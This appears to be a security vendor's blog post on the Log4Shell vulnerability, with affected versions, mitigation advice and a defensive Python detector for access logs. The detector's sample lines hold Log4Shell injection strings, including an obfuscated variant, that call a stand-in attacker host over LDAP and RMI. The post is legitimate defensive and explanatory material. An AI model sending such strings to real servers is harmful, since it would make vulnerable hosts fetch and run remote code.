The latest zero day is a big one. The recently announced CVE-2021-44228 (dubbed Log4Shell) identifies a vulnerability in the Java logging library "log4j". This CVE carries the maximum severity rating of 10 out of 10. The log4j logging package is built into a significant amount of software and services, including those from Apple, Apache, iCloud, Steam, Tesla, Minecraft, and many others.
TL;DR:
Critical Path Security has been working non-stop to stay ahead of this threat. Our Threat Intelligence feeds have been updated and rolled out to include detections for these attacks. We worked hand in hand with our trusted cyber-security partners to combine our Threat Intelligence with vulnerability identification mechanisms to provide overwhelming support to our customers against this attack.
Additionally, our world-class researchers, responders, and analysts have been working around the clock since the notification. The team has continually rolled out additional detections and has worked closely with our customers and partners to respond to attacks.
We’ve got your six.
Technical Explanation:
This exploit allows an attacker to pass a specially crafted string to the target host, which causes the host to make unauthorized external connections through log4j's JNDI lookup functionality. That external connection can deliver remote code that the host then downloads and executes. The most widely exploited method for passing this string is to place it in the User-Agent header, a value that log4j commonly captures in the logs; however, the string can also be placed in any form field submitted via an HTTPS POST request.
The attack is trivial for a threat actor to execute, and a successful exploit grants the attacker the ability to run arbitrary code on the target system.
Log4j versions 2.0 through 2.14.1 are vulnerable; version 2.15.0 contains the first fix for this vulnerability. If your systems are using a vulnerable version of log4j, the best option is to update log4j to the latest version. If you cannot update this software immediately, there are other mitigation steps.
Be vigilant, and wherever possible update every copy of Log4j as soon as you can.
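As an added example (not code from Critical Path Security or its feeds), the following Python detector applies the points above to web-server access logs: it collapses the nested-lookup obfuscation attackers use to hide the JNDI string, searches the whole log line rather than only the User-Agent, and checks a log4j version string against the version range stated above. The sample log lines, hostnames and IP addresses are constructed for the example.

```python
import re

# Constructed sample access-log lines; hosts use the reserved .invalid TLD and
# documentation IP space, so none of this is real traffic.
SAMPLE_LOG_LINES = [
    '203.0.113.5 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.7 - - [10/Dec/2021:14:02:13 +0000] "GET /login HTTP/1.1" 200 811 "-" "${jndi:ldap://attacker.invalid/a}"',
    '203.0.113.9 - - [10/Dec/2021:14:02:15 +0000] "POST /search HTTP/1.1" 200 120 "-" "${${lower:J}${upper:n}${::-d}${env:UNSET:-i}:rmi://attacker.invalid/x}"',
    '203.0.113.11 - - [10/Dec/2021:14:02:17 +0000] "GET /docs/${date:yyyy} HTTP/1.1" 404 0 "-" "curl/7.79.1"',
]

# Single-character nested lookups used to hide the literal "jndi":
#   ${lower:J}   ${upper:n}   ${::-d}   ${env:UNSET:-i}
_INNER = re.compile(
    r'\$\{(?P<fn>lower|upper):(?P<c1>[^{}$])\}'   # case-mapping form
    r'|\$\{[^{}$]*:-(?P<c2>[^{}$])\}',            # default-value form
    re.IGNORECASE,
)
_JNDI = re.compile(r'\$\{\s*jndi\s*:', re.IGNORECASE)

def _resolve(m):
    if m.group('c1') is not None:
        return m.group('c1').lower() if m.group('fn').lower() == 'lower' else m.group('c1').upper()
    return m.group('c2')

def normalize(text, max_rounds=10):
    """Collapse nested lookups inside-out until nothing changes; the round
    limit keeps hostile input from looping for ever."""
    for _ in range(max_rounds):
        new = _INNER.sub(_resolve, text)
        if new == text:
            break
        text = new
    return text

def has_jndi_lookup(line):
    """True if a (possibly obfuscated) JNDI lookup appears anywhere in the
    line, not only in the User-Agent field."""
    return _JNDI.search(normalize(line)) is not None

def scan_log(lines):
    """Return (1-based line number, de-obfuscated line) for every hit."""
    return [(n, normalize(l)) for n, l in enumerate(lines, 1) if has_jndi_lookup(l)]

def is_vulnerable_version(version):
    """Advisory range: 2.0 through 2.14.1 vulnerable, 2.15.0 carries the first fix.
    A pre-release suffix such as '2.0-beta9' is dropped before comparing."""
    parts = tuple(int(p) for p in version.split('-')[0].split('.'))
    parts += (0,) * (3 - len(parts))
    return (2, 0, 0) <= parts <= (2, 14, 1)
```

Benign lookups such as `${date:yyyy}` are left alone, so the detector only flags lines that resolve to a JNDI lookup.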
Feeds:
https://github.com/CriticalPathSecurity/Zeek-Intelligence-Feeds
https://github.com/CriticalPathSecurity/Public-Intelligence-Feeds